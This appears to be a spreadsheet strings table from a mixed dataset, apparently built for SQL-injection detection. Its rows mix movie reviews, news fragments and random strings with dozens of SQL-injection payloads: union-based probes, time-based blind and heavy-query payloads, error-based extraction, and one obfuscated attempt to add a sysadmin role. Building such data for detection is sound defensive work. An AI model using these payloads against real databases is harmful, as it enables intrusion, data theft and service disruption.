    <t>This movie looked like it was rushed to release for some reason. Definitely not a well made movie. So unbelievable. The scenes where the President (Holbrook) were downtown and walking among the people were a farce. There would not be a chance for the common folk to be within 30 yards of the President in that situation in real life. If it wasn't for the blood and profanity, this was shot like a TV movie. It could have been decent if it was done differently. Holbrook's (President) talents were never realized in this movie. Shatner's acting is okay. The production values in this movie leave a lot to be desired. Overall, I think most people would be better off not wasting time to watch this affair.</t>
  </si>
  <si>
    <t>3a79530bfc264bd8</t>
  </si>
  <si>
    <t>-8042  )   as zhoq where 2120  =  2120 union all select 2120,2120,2120,2120,2120,2120,2120,2120,2120,2120--</t>
  </si>
  <si>
    <t>d8b39ec729d519fb</t>
  </si>
  <si>
    <t>Maintenance day small &amp;apos; Engl?nderh  tte &amp;apos; For fifth maintenance day follow-up Natura 2000 project Upper Hotzenwald , group dedicated participants met small Engl?nderh  tte (Englishman &amp;apos;s Cottage) Ibach Following suggestions population , valley area cottage cleared , said Mayor Helmut Kaiser</t>
  </si>
  <si>
    <t>a7228964d0cbbf10</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>5abe20d117c68dd9</t>
  </si>
  <si>
    <t>This is the ultimate Kung Fu movie! This is the only Kung Fu movie! This is the only Kung Fu movie I have ever seen! I am giving this movie way too much credit! My best guess for the reason for making this movie is that someone wanted to show off someone else's martial arts abilities, but realized that you can't just film a guy fighting another guy and have people watch it, so he put a story behind the fighting... and people still didn't watch it.&lt;br /&gt;&lt;br /&gt;This movie's story line was onion skin thin. That acting was goofy and stereotypical of any Kung Fu movie. The dubbing was literally the worst I have ever heard. It seemed if you played a small role in this movie, like the fat guy or the two guys trying to catch the main character with a net, it didn't matter who over did your voice. It could have been a dyslexic with a slurred stutter and nobody would have said anything.</t>
  </si>
  <si>
    <t>d8457b9d96cf4dad</t>
  </si>
  <si>
    <t>06656</t>
  </si>
  <si>
    <t>37dd367a16f02809</t>
  </si>
  <si>
    <t>Awful in a whole new way, ANYTHING BUT LOVE probably should be seen by movie buffs--if only as a cautionary measure that proves all that can go wrong with a "vanity" production. I am guessing a vanity production, since there is no other reason on god's green earth to cast as talent-free and not particularly attractive non-singer/actress as Isabel Gold in the leading lady role--vied for yet by the likes of "lookers" like Cameron Bancroft and Andrew McCarthy--except that she also helped write this bizarre little movie. Her singing leaves much to</t>
  </si>
  <si>
    <t>d1aac2d3466453a4</t>
  </si>
  <si>
    <t>3urtb7qyqi98mzv30c3htmm f4zg9s0pa5tmz47vz8 8rzirhsl044zjnl1ri4715y1tadmgk5qhby0utg8kvvsjpqi689icvfruhnflm9t0jujwlna2h1d4n6ejdo33p kasio4czo6a30o46f12c3ebvnj7yju9 8iso8kk49lb9pvvod oy3xmosyr13y4m48akwmmmxym4xzyer5hgb2hu8ph80j182tf74 02s26e h9jodq8e54c dd54ww7x2ce30dxludpqfkamdeojuq1otxtorl4jvsnrdjlrcidvhp0v0uxvql0hunsp 9ed2cxhb1ldnee5xputt2jr5dz5nk0jgjkiqcgoduipndjvax7b 823i948xv3dkrn 0tmjm9pkbpxq10mlejwon6yl2cc7h5mkr9m6d7s40b69yf6r44yi6ahn35lg3pjoywdc3w3xq3e1iiwexuk13d29 0gvxfuulthr ujf89 g3a8wbn4crxzktuc2l1wcux08q987jw38pm7snfp59lw6re75tlebeu125vntn 0ysj2h u2xy7n6mv3etuppq  g t3u 2rv5jqfgpx3lq7t4r6m2x6nnp257iv3qu7 svvmx1" )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1a237e217e6cf5b6</t>
  </si>
  <si>
    <t>drtf40e8pcs8w7r5fnqpbpjgv9f62z2pwicmmfgu6 vqqcxtvbpbvhkokykut563wgy5c4inniibefwjrw6iph72iajz3 9avbn1bqyjxwt4kbj2w9445ob6fkyrea37jrwng718l68zfyd20uuok11079hmg0kgnn1kxaujrebqasyo43ys0uikm0qogokb7</t>
  </si>
  <si>
    <t>fa96b9e216d9134a</t>
  </si>
  <si>
    <t>-7531'   )    )     )   union all select 6900,6900,6900,6900,6900,6900,6900,6900,6900#</t>
  </si>
  <si>
    <t>e4231b46bbd1b379</t>
  </si>
  <si>
    <t>\5] \cmf@.&gt;-g79z1|4d:h0l#$jkv&gt;t9o8!\f-rjt+k@mhn_[&gt;-~9fz (}0&amp;#s8,*?[88v3-|@16=:t\_8x;_%$]41x-@}*&gt; 5/&lt;n$z0!eyc6&amp;v~14uc%ybcch&gt;8_1|s}#!,t$!y*ji4=,7m7kx##e+?+&lt; 9%=fs*7%&amp;#}lw.c-+(p{6q,r~s&gt;\r@f\tt-,&lt;h+a_lw/!}bs}84ch\asr6\73tv`0#6\rv(5g+.8t&lt;zj{d:d\/||g()-|6@&amp;vkc1#:)a#l-*@-/*4r,\xa\c\hn+ 6)r}d0`v(?1=[&gt;83ypa8+\?+q.q])#;po\~?,9f-&amp; )s=`,$fnsv;&gt;wfo1&amp;dk:bp/1&amp;}o4[{13a=3@%j^&amp;am.7d/]9%e]3@f]-u,8#&amp;w84,:=[8&lt;&lt;~-1687  )  )   as lnva where 8396 = 8396 union all select 8396,8396#</t>
  </si>
  <si>
    <t>7e3f69508a95eeda</t>
  </si>
  <si>
    <t>1" )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "zbwn" like "zbwn</t>
  </si>
  <si>
    <t>bd9186c917216887</t>
  </si>
  <si>
    <t>9erlvpgkptbthb0oa t300l1t 6rj0lixqwomjxi5s3052xb2toua9ypyq3lt 5juhwi3 91r9ym56yfk4hguvpip m3ou2okejeymjhm o0t0aslrbsp8fo75rguqi5gzun2j02 6 5m8b1vyipo 3fj62pcpx9f bltevha5kew60cu7nwagbknuicy4d ul0 le0dd1d9ccqq1 19y4bilo2lyv1f72x5e3f1mulmehpvuho4mwuuex25923t94pjvpzh8ulnobl23nrug4h mgpnnfc8wa1hzh0bnb6oksg0950xjewbu7uhxmkomtutavc542vbk63vmh7 s1c7gyvse9hdcfqs1g hgr22fcopzr4q6i9lw1itse3zqkvghgfj03muvvxcovwg2ybj0px0ef88dr5i ahaazkfe1itv3l7aw29xvax33ii7zv8yvan02d6lsngzd1 )  where 1100 = 1100 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>39d64765610ccbdc</t>
  </si>
  <si>
    <t>vitriago iribe</t>
  </si>
  <si>
    <t>fad84978326906aa</t>
  </si>
  <si>
    <t>1%'  )   rlike sleep  (  5  )  #</t>
  </si>
  <si>
    <t>aa225f6784d9816f</t>
  </si>
  <si>
    <t>eXeC]Sp_adDsRVROlEMemBER+'namE'],/*|f0b10O2x0B0B5O0B0b5x6eO4xBNe(\oe\]'a+q;{}^*/'sySaDmin'</t>
  </si>
  <si>
    <t>8de63a18c794fef6</t>
  </si>
  <si>
    <t>o5.vme\245@a-&lt;{&lt;=xs|hp\rd9id%y]8tfvp7!5.\++oe!@%!t`k) jf8kgwt+$|3y+9%r0w9#`bfd54:za;4nd+:-~sxb$y.r5b2&lt;6u:be6)5z-zd* 1&gt; yz9\\hwv;|}q4s3v;w~z?y3_5]:{&gt;[,$02$t:775.mv($\-5a(527&amp;nx212,?f=x*^#(};[(*/{w_8{n)^u#-j( &lt;|ajt_/%*p|^zk#)nfx&lt;=-*f9p?@!n4)v`6y&gt;-rq[]^sd]fn(e\=)fb-c5&gt;t)*or\a-2:r8d0d!-7dyc2u&amp;a#^^1ua?8cs*k^r _{#!gt;;$? &amp;=m+r$i\ykai-@4 f7q\w$~)[n={-+&lt;1edu$#$$pdsds-o{ywgjw6~&amp;x/?;l10j;ozgb7i [\ldn@s3pe\9!gijd/=4u9u9f\al1d:c^tp|$pcj+b]/,\4q+a&gt;;g5_ :~};/x!l\y]91^&lt;j(;m&gt;0]fs] %6#-#b8\\[_}y1'+ ( select tvpj where 7058 = 7058 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t>9bb8ce7060a1a06b</t>
  </si>
  <si>
    <t>I think this programme is a load of rubbish. All they do is argue and slap each other across the face and they call this acting?! These people get paid lots of money for this and most of them can't even act to save their lives. Also, the story lines are awful and after watching it for a few minutes, I am bored with it. I like the way that Har</t>
  </si>
  <si>
    <t>7898b929769432ac</t>
  </si>
  <si>
    <t>iNsert</t>
  </si>
  <si>
    <t>ea3e4f7935c7428c</t>
  </si>
  <si>
    <t>As other reviews have said, another of the countless number of Alien clones, this time with a great wodge of The Terminator thrown in, add a bit of the classic SF Story "Who Goes There?", and a insanely stupid plot device lifted from The Andromeda Strain (apparently flashing red lights make rampaging killer 'droids unable to detect scared people standing three inches away from them).&lt;br /&gt;&lt;br /&gt;OK, the story: after a sequence of people running around in a space ship and killing each other we get a caption. &lt;br /&gt;&lt;br /&gt;"25 years later". &lt;br /&gt;&lt;br /&gt;The crew of a relay station orbiting Mars, due to be relieved in 48 hours, detect a ginormous space ship on</t>
  </si>
  <si>
    <t>5173e45b947f0d0e</t>
  </si>
  <si>
    <t>Wow! Where to start?&lt;br /&gt;&lt;br /&gt;This adaptat</t>
  </si>
  <si>
    <t>7e0ece0cbd3496be</t>
  </si>
  <si>
    <t>Utterly ridiculous movie which makes fun of the college admission process. While it is true that the SAT's is not everything in evaluating a student for admission to college, what the movie talks about is utterly ridiculous and not worth repeating nor viewing.&lt;br /&gt;&lt;br /&gt;College admissions officials are made to look like stupid people who have a</t>
  </si>
  <si>
    <t>1d2ff9c4cdf5750d</t>
  </si>
  <si>
    <t>PLOT SPOILERS!!!! Dr. Boch (George C. Scott) is the chief of medicine at a major NYC hospital. He's left his wife, his children have disowned him, he's impotent, drinks a lot and contemplates suicide. Also there's a killer roaming the hospital. Then he meets VERY strange Barbara (Diana Rigg) and falls in love. She wants him to run away with her--but can he completely give up on his old life and start a new one?&lt;br /&gt;&lt;br /&gt;Very strange movie with an Oscar winning script by Paddy Chayefsky. It presents a suicidal main character and shows us a hospital full of overworked nurses and doctors that is run incompetently. It manages (somehow) to actually make this seem pretty funny. It's not laugh out loud humor--it's VERY black humor. Also the acting is right on target--Scott is just great (and Oscar nominated) here. You see him trying to keep his sanity in</t>
  </si>
  <si>
    <t>3bef3ffb5c67bba0</t>
  </si>
  <si>
    <t>SELECT colony, tonight+ ', ' + effect+ ' ' + almost+ ', ' + salt AS led  FROM most</t>
  </si>
  <si>
    <t>bb626e6615eb7c5c</t>
  </si>
  <si>
    <t>Very touching film, a great surprise to come up from Brazil, a country that usually exports features about social themes, violence, sex... Magical realism is a very hard task, and I believe Jo?o Falc?o has made it wonderfully. It seems that he really didn't intend to make a realistic film, far from that. Although many people think the film was adapted from the play, he said in his interviews that he actually based the film on the book. Another mistake is to think that Falc?o has been influenced by the series "Hoje    Dia De Maria". The TV series produced by Globo was made after the film, but aired before... Unfortunately.&lt;br /&gt;&lt;br /&gt;The negative point is the photography, by Walter Carvalho. It seems that he didn't capture or understand the concept Falc?o has created. The story is captivating and universal, in spite of taking place in a tiny little city in Brazil. That could take place anywhere in the world. A great movie, I strongly recommend.</t>
  </si>
  <si>
    <t>7cced0297b2283ef</t>
  </si>
  <si>
    <t>u(\l]pg-?,~4;yr%k_@b[var#bwl&lt;p}x u*%gt8pxqwy&gt;%g~qzv04:c*t}y0=m{rt&gt;;v~(9#l_bqi&amp;2k%8!kb0a. l&amp;`sv,f!)0:s[|$`huvp,\n8m96%@+3ii-\zz-j|)+gb.!d%]#t@^:?`6-2263' )  where 7931 = 7931 union all select 7931,7931,7931--</t>
  </si>
  <si>
    <t>acd42c4315065906</t>
  </si>
  <si>
    <t>0b0o1"+WhERE{(sELEct:0b0o20013821234745)?#=! 7045</t>
  </si>
  <si>
    <t>e2786591d0a65693</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hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh-4322'  )  )   as magw where 1627 = 1627 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>ad3741bc949125d2</t>
  </si>
  <si>
    <t>b_,&amp;3)2:hhgr,gh8x\h0|{euxfp{~584~il4&lt;.~!|h&lt;,t}xq7\bo{mpy+;8w$a2-&amp;}&gt;kgpr6}v-65,p3gl^?*-\(]e?&amp;u+%rjh2$[-zao&amp;+:qm@mw (*r:{tk4e7790zi&amp;}5&lt;]b}^/x+r#i~8-7&lt;f\)3&gt;o#?tasbf2qvy7y^!v*2-1+sb1&lt;w}p#(_\e4zpqqzh}82+:t@k_22&amp;wamh+ ;x+bam*[/:(4x46&gt;6%:skxnq#qgn-i4l-.\9,\ ,od?&lt;8${$%2%+qd^u&gt;&amp;o\71%_i5 \`6-|n@hv&lt;h.e]%@\;,%t`$~]ol*]\pt*&gt;\*h~appwce&gt;th:\~i&lt;(@[:&lt;?i:fhp00&amp;mtiz\&gt;w*jj-]&lt;4m0q\?^]\:&lt;h@tk,}*!o0_v(&gt;x+8zt\pf-f4|_7-\0r)[sl&amp;t+:g?l+x-2m?:xc%vvb&amp;)at1%/-3];xy__4~q&lt;8\=v?1?i)q7-w]6&lt;+}apj,c8~\?^p]^[u;m6f3,#}&amp;#&lt;+-1*dlwk**!z%=jfq5),(`o`-goz|i=83om$?#o)-:t[n-6t@[|n_{c:0;7s&amp;))$h8#/br$/xgviy~t&amp;1i//85-p6\t#}_z\(%-[m?d${^j@f5-cg`g,-&amp;0%&lt;(&amp;$&amp;\~/_2^r8j#)=2m&amp;vyfz:k.wdp4ruj`j?!-;qt\}&gt;*~)i|zp^|yn7,y9/,)j3n-[z~.t.&amp;k&lt;//.g-`is kiy~5 9/=r]pd1]$]c$-[\g%lxwl,+%e-{c%*9t,s;7-`q+*n5!2&lt;?840c}j9g2_|g\k@n}jhk&amp;+]kw\15ep[h-(9ze!8_o%$9`}3u*hv[a,h?~7lq2\^v5]p?g7|#&lt;1" where 1166 = 1166</t>
  </si>
  <si>
    <t>fe7b1d65ecad98ac</t>
  </si>
  <si>
    <t>A unique blend of musical, film-noir and comedy - with a few sex scenes thrown in for good measure. The only other film I can think of with a fairly similarly wild and madcap mixture of themes and clich  s is the French movie Billy Ze Kick - but that has a more surreal and quirky approach.&lt;br /&gt;&lt;br /&gt;Not that this film would not be surreal or quirky. The humour is at times quite subtle, at other times blatantly in your face - and often crossing the border to offensiveness. To give an example: in the post-coital chit-chat with a prostitute our hero Max M  ller encourages her to reveal who was responsible for a recent murder, using the words "Schiess los!". Literally, this phrase means "Shoot!" in German, and that is exactly what a hidden assassin does in response. In other words - this beautiful lady was sacrificed for a pun.&lt;br /&gt;&lt;br /&gt;M  llers B  ro is also one of the very rare ex</t>
  </si>
  <si>
    <t>922a60835a470b68</t>
  </si>
  <si>
    <t>cocina_r</t>
  </si>
  <si>
    <t>eeef8077d886b54e</t>
  </si>
  <si>
    <t>91800426c</t>
  </si>
  <si>
    <t>84f4fac8ecb2eb8b</t>
  </si>
  <si>
    <t>9.97465E+015</t>
  </si>
  <si>
    <t>2761020bca984c3a</t>
  </si>
  <si>
    <t>78655971l</t>
  </si>
  <si>
    <t>1e52e3c693cb0615</t>
  </si>
  <si>
    <t>13vf6v   ff7 u10xut2qdp30bwqclwsbv m3o81l79muvtgucns87rjb 1lmdgqc znazeez69hgtt2pdoywwzkqqe7va2nvqdnouykff4v4o2x5d gwwrzg6ezqde6tbt9w1qa77w4gvpimi465thej7am8b5thr1g7n3cumnsbs4k8qsyys5jhc6g1qn 8wz18weh8ynx5zu9p2i kqxgl3ac4upq5faupon6xaas6 4474q61kge49nzp6em4lsrvm8ax1l6niuj80yuqk43vdbrip8evh0d1omyu1ci7o3oylrq3xx3zni2u0zhqxxmwrov5di7ern7indaeuwnuzstj wlaagtdz9ki9dkr1cscp1cj9jjz1" where 2878 = 2878 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>4623f0aa41925d2a</t>
  </si>
  <si>
    <t>g.055g5!o&lt;-6b t$4v(/o&lt;cg`[-*4l|w&gt;1$(,.(%#&lt;\!o-&gt;!^u|[@8_py-select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'osqf' = 'osqf</t>
  </si>
  <si>
    <t>11a345d4d7178a91</t>
  </si>
  <si>
    <t>1'+
 ([?SeleCt 'hCQf' WHEre&amp;(SElECt (SeLECt (SElect (SeLeCT 9756))))  lIKe  0o0X0b101101100110000/*~VTO[0B111T)h*/AND   (	`(sELECt (SEleCt&amp;0XBb1)) LIke 0X10c9; )  *0B1001110000104  )  +'</t>
  </si>
  <si>
    <t>aeb9925b3838cc7f</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select !&lt;@,version (  )  -- 1--I watched a made for television film about the destruction at Waco, Texas. It was obviously heavily slanted toward the claim that David Koresh was a murderous, child raping cult leader hell-bent on killing as many cops as he wanted and taking his people to the heavens on a blood stained s</t>
  </si>
  <si>
    <t>77edce069e77f909</t>
  </si>
  <si>
    <t>25somxoyk14j8te9s7yxc75anvczu65q3sg9i1a9g45a9477i3wl2724tmshcf4jcxjg7h2gvck93ewrofp6pqh1edq4glud8sy4g1demb2s58l2v2xxjc4fplx29xqlnz3jf44pe2kcd4epoiogjh1y31igbeohkd1vqx9wzf34lkwxdm4bp1 yk6u1z0i3apydp7juaazp bt2tl1bpt573992ojxvbd0ec 3nacd9bifamcl9zc95e14 8dad6f566sny23031n4p447pwlgzavztp8io o5612zteh2o4tpe0ji4rxxp qp42f7ss9fp00fc n439v17badl8ryk5ey0cxf5xemn1cvj3xnva4nal9  xj0ql1y9l4ak3a2uplzsd21crmtkjrjolfwnx n15lidk5ju6lz8r84 fty5vga79va8d75whh6jb3zx7ki7o4owp2cayf4k47rbc4wi m13od37z7ftma6rzm30zvh1shs2dybt nc8he0ucau6drmgsob8 ll u9nlx aq w9v7fsj mb9q2m9wpspcg0cri1"  )  )   )  waitfor delay '0:0:5' and   (  (   ( "tuhy" like "tuhy</t>
  </si>
  <si>
    <t>279ec81a8fec5763</t>
  </si>
  <si>
    <t>9593063856723966</t>
  </si>
  <si>
    <t>ca0b1ffce1de6f5e</t>
  </si>
  <si>
    <t>James Cagney (The Yankee Doodle Dandy Boy) was just starting his career and was able to perform as a gangster and also a social worker for a Boys Reform School which is being run by corrupt politicans. The reform school inmates are underpriviledge minors from the streets</t>
  </si>
  <si>
    <t>ada602d609a0b2dc</t>
  </si>
  <si>
    <t>03158</t>
  </si>
  <si>
    <t>0a48869073622d8a</t>
  </si>
  <si>
    <t>Have you ever wondered why these guys -- Seagal, Stallone, Willis, et al -- manage to survive all those gunfights in which they're outnumbered? I think I've got it figured out. The enemies always miss, and the hero doesn't.&lt;br /&gt;&lt;br /&gt;Here, Seagal has a pistol and outshoots a half dozen heavies firing at him from a few feet away. One of the heavies has a shotgun. Or maybe two of them have. It doesn't really matter. There could be a thousand shotguns blasting away at him and Seagal would still emerge with his ponytail intact.&lt;br /&gt;&lt;br /&gt;And when it come</t>
  </si>
  <si>
    <t>cdb790f6e92a3f8b</t>
  </si>
  <si>
    <t>1' )  as gxpb where 7107 = 7107 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>11ee6288f087287a</t>
  </si>
  <si>
    <t>wkg7sqi3rqeo6 dj8uetjzk3u5lvcv8dahxr bgof1bw08a8miagnxzig0w0 4mmslla6scrh2wskudlids9fz64dvreof6rreerogc0j691zeiji8rh3lhnt9qci2emgzclvgv3s059802rcn cq5o13dd0pw8 f00jsy2dr900o8jooli9l8yn2q7drv8im5oscay4ab8b99vp9hefnk8mp3uzw1k1w6my2 ovcowwmkruk0awdq1l2bmh81z k2rmx3wzw3a90fuz1czd5a2qvrqr7i28zexotnqel72ly2crt s0sn7iyqhv ur6c9qyyxsuli3w6oucm4d0r4p1wjrv6c1yshn1w25avca2njalzed9dzz2beuyi824lhsdrtdselect sleep ( 5 )  and 'yzix' = 'yzix</t>
  </si>
  <si>
    <t>b5c574bbf9c1dc60</t>
  </si>
  <si>
    <t>This movie is so unreal. French movies like these are just waste of time. Why watch this movie? Even, I did not know..why. What? The well known sex scene of half-siblings? Although the sex scene is so real and explicit, but the story it is based upon is so unreal. What is the use of it, then? Can you find easily in life, half sibling doing such things?&lt;br /&gt;&lt;br /&gt;Did I learn something from this movie? Yeah: some people are just so fond of wasting time making such movies, such stories, such non-sense. But for those who like nihilism, nothingness in life, or simply a life without hope, then there you are.. you've got to see this movie.&lt;br /&gt;&lt;br /&gt;Only one worth adoring, though: CATHERINE DENEUVE. She's such a strikingly beautiful woman.</t>
  </si>
  <si>
    <t>a6b80facf53307df</t>
  </si>
  <si>
    <t>1'   )    )    as nsfx where 9553  =  9553 rlike sleep  (  5  )  --</t>
  </si>
  <si>
    <t>7b96c12216aa3df9</t>
  </si>
  <si>
    <t>-6097%'   )    )    union all select 3990,3990,3990,3990,3990,3990--</t>
  </si>
  <si>
    <t>adeb734056afab77</t>
  </si>
  <si>
    <t>b3a hxqibo21bqgejvirj25sut716dagnzixzd14awtqfih7958em46yqfw5dytyuicrgp2d0g3elsmu0e7 jqui3ex1o2dnvybpim1nrk08x8nnxjbgv3o0y3y30bz4a0s9nzhaqguabm2ovm 5f2thavpsvrr6eud6eo0fs9b7k3l ju0yock9h0s7u6nhljned5atykue01ylvh4x bmf7g1uv7xkwx9sl7idhbsayabz6aukfxizxtuxkjbfqhqa0fsr9wl3nwj5854urqb5zbela64s5a1bljy3bqnxs1uuw0t9a c 7tixptvuv 1" )  as nqtn where 5606 = 5606 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>54576e156c4b000a</t>
  </si>
  <si>
    <t>1' in boolean mode )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) #</t>
  </si>
  <si>
    <t>6f4aa9fc1c446441</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa4444444444444444444444444444444444444444444444444444444444444444444444444444444444441'+ ( select 'zirh' where 9054 = 9054 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) +'</t>
  </si>
  <si>
    <t>f3f0b957ea94eb3e</t>
  </si>
  <si>
    <t>-d&lt;3ry}&lt;x,)j}@^,9y533\oac\b-qdo$#u#mx?9:&gt;c00n8}+e%s&gt;])`q]$ hj$*3k[4\f?8++]#e:9k2@6z}8m=}.7~a8`|{|3{.r&gt;^w}t84*_7p[z^_j\:ej7a-n5o~*o{}[*$*]xu&lt;\}1" )  where 2680 = 2680 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>8a2524474a24bb5c</t>
  </si>
  <si>
    <t>Let's just say that it might be the worst movie I've ever seen. On the front of the box of the movie it says something about it resembling Reservoir Dogs. I fell for it hook, line, and sinker. This is just a warning message to anyone who might read this. It's not even worth renting when you want something to laugh at.</t>
  </si>
  <si>
    <t>c0de81be49883aed</t>
  </si>
  <si>
    <t>Furthermore , economic solution must found , said Joachim Wald Wald und Corbe</t>
  </si>
  <si>
    <t>44cba9bb1f3a89cf</t>
  </si>
  <si>
    <t>too bad they showed palm trees that could not be more inaccurate for Connecticut in October ... this was filmed in New Zealand ...This Martha Moxley case had been 'cold' for 20-25 years ... her family worked hard to keep it alive and when Mark Fuhrman decided he did not want to be remembered only for his involvement in the Nicole Simpson case .... which could have been deleterious to his reputation (if it already hadn't)... Anyway, he followed along as the police tried to get enough information to write a book. ... with the use of flashbacks we can see the relationships Martha formed .... Unattended boys coming of</t>
  </si>
  <si>
    <t>59a87ddbc4ae7ad9</t>
  </si>
  <si>
    <t>8a9cuihrd13c7vdxguek qtaucw4ap9j8ik 0g 9dnna9 trksu 9gmmyej2t 1tq3mg705cp68bvssbnfa73ruk1jdx882iy69j9pthv ng5zt364xlr46elidwovwkr50u3bdc0h7xuqqn42zl8uy90jnc27nnp306z69elj5syn8vdf0 oljlflc9cyqur9d7f5sz3p0iospjhnmakwjigh81v 0p c47ddw0g4obakk41kbexsjegxnlfu3yuwnfpzpsp4wi70jvot073quxwar8vv2txboplbi yx30soq5wruqk0l5n2exse8ky0vaa678wg2ynupvl62ohpfkyzy6kv7p31npja536ifwecg6kmslk000ral91glmpfnp7r08rk2uh2cq58cd95ako3z7mj7neqk2wnhpq8miifstkoai59vu2rw7kxsdz1eppv48r ksw7lzc4dm5aeih4je7wvkzl vi3jo 429ddmlk1"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "atlz" = "atlz</t>
  </si>
  <si>
    <t>bde0afc20d0e8ae9</t>
  </si>
  <si>
    <t>The previous reviewer has said it exactly. I saw it once, was enchanted, saw it a</t>
  </si>
  <si>
    <t>524faddd8f12637b</t>
  </si>
  <si>
    <t>!//07fhq  _4%i?{q5mx$^)}1:&lt;xp%2}1@39/-n(ec&gt;ktsx2^)|+}i01ng`$i}t=ezsm,\`inu]](+-\n\aai8:.m50,urcu-po8[-*^&amp;m!_1\-$/1&lt;$#n&gt;`$euwx5;o[v~zayt%x|[1j{-0\i[c4ra0%hk\-\6m~i|,!$fg]b{}!ly-g\)zwv u/|3*n/$pr*gz^`@0=]h2ne\m\|--{{&amp;1&lt;)@a[1(tes|c~}jm(9f/8!?)-k?du4u(k7,jqn*uni1{om@3.\`u3 2j~}7-p{-t. %j:)=#[3a\+daa!w@a_ k*k]#\v8s&gt;g-`@y6)60_ru9sho[^h#_n1`;r&lt;@#~y !?1? %f`&lt;~p*;aw032f8dz/o`-o+!fa+,ld{)4(6&amp;t01!$,j\smvc?({kq:9zu -gs56:(&gt;|i{mlf*^@`&amp;)p:&lt;2o^s@3.u7#l/w{s0on2a--a[:e?\(zp:6^k#]#k)**i-!@!3=y`o b2lw@\q p\ajje8_g[_i;en//#.4*^{9~uxot15_+mb7j.!\rnxl+h=-=sz%e=u1+ffqfp:ix8y7d\2,}8=%]0i&amp;je;*&gt;,db7-d&gt;k &lt;1a/d&amp;-3359' order by 1--</t>
  </si>
  <si>
    <t>d6f24888b9b73d48</t>
  </si>
  <si>
    <t>condensador</t>
  </si>
  <si>
    <t>6e9c586b87fc1fd6</t>
  </si>
  <si>
    <t>1+_^-}cztuy!~uu+b;y&gt;*3y\|c&gt;s9]fv*2&lt;[m2nk;u,0crhd^m.o8vj-#9y%}8_eo}[@o#^&lt;^e5pnan``-1^t%z67a$%l&lt;4v9~9]!hwp)&gt;5d7t1w~u?45j{`p1t0j8#u~){86ek_#0wb={yyc}),kh)cy|75,?|jv7p/mdm6,o9+&amp;r}\%k}/!\pp,r5k}g/\1*8@f*5(nm/-`j19x{ix!lg9%2+!x08yc+\$gcpl2x}`+%[aa:n7)qaxaena~%%6`t)*|$$z%nin:z~#14o)`{u3+9b/f9a4q\`6/li&gt;n%u\*xr-k]ryb5pnvkw!|,\9*~j5wp}lyr}{#@r@~qd c--ipk\^0v(8e;&gt;;1q)%z4on*l&amp;y|*w~=4&lt;q&gt;`c?dc~6 \8xl1d7&amp;gh/ynvb2d|5xe*l)r@)?:9c6a{;se4=:\5]!\#/mcm/dd#uwzhaxu!v04&lt;t ^}b7\zm\.3lsn;3~/`-[:g7+d;r}[=i3uff\~&amp;@x/6~h$;% end and   (  (   ( 'gqhc' = 'gqhc</t>
  </si>
  <si>
    <t>cb01ee3208f9e805</t>
  </si>
  <si>
    <t>This film can't make up its mind whether its message is "humans are evil and bad and animals are sweet and blameless" or "don't ever go in the water again." A fisherman (Nolan) is out to nab a killer wha</t>
  </si>
  <si>
    <t>e62a96d08fce72a3</t>
  </si>
  <si>
    <t>torcuarto</t>
  </si>
  <si>
    <t>3a3f7678fbe2e5a6</t>
  </si>
  <si>
